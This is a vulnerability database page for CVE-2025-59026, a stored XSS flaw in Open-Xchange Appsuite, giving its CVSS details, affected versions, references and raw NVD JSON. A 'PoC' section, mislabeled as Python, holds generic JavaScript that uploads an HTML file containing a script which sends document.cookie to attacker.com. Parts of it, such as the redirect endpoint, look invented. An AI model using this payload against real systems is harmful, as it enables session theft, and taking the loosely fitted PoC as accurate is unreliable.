CVE-2025-59026

Description

Malicious content uploaded as file can be used to execute script code when following attacker-controlled links. Unintended actions can be executed in the context of the users account, including exfiltration of sensitive information. Please deploy the provided updates and patch releases. No publicly available exploits are known

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Open-Xchange Appsuite < 7.10.6-rev39

Open-Xchange Appsuite < 7.10.7-rev15

Open-Xchange Appsuite < 8.10.0-rev12

Open-Xchange Appsuite < 8.15.0-rev7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-59026 PoC - Open-Xchange Appsuite Stored XSS
// This PoC demonstrates the stored XSS vulnerability via file upload

// Step 1: Create malicious file with XSS payload
const maliciousContent = '<script>\n  fetch("https://attacker.com/steal?cookie=" + document.cookie)\n<\/script>';

// Step 2: Upload malicious file to Open-Xchange Appsuite
async function uploadMaliciousFile() {
  const uploadUrl = 'https://target-server/ajax/upload';
  const formData = new FormData();
  formData.append('file', new Blob([maliciousContent]), 'malicious.html');
  
  const response = await fetch(uploadUrl, {
    method: 'POST',
    credentials: 'include',
    body: formData
  });
  return response.json();
}

// Step 3: Generate attacker-controlled link to the uploaded file
function generateAttackerLink(fileId) {
  return `https://target-server/redirect?file=${fileId}`;
}

// Step 4: XSS payload - Cookie stealing
// The script executes when victim views the uploaded file,
// sending cookies to attacker's server
console.log('[+] XSS Payload: Cookie stealing initiated');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59026
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59026
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59026/
[4] VulDB https://vuldb.com/cve/CVE-2025-59026
[5] https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59026", "sourceIdentifier": "[email protected]", "published": "2025-11-27T10:15:52.007", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Malicious content uploaded as file can be used to execute script code when following attacker-controlled links. Unintended actions can be executed in the context of the users account, including exfiltration of sensitive information. Please deploy the provided updates and patch releases. No publicly available exploits are known"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json", "source": "[email protected]"}]}}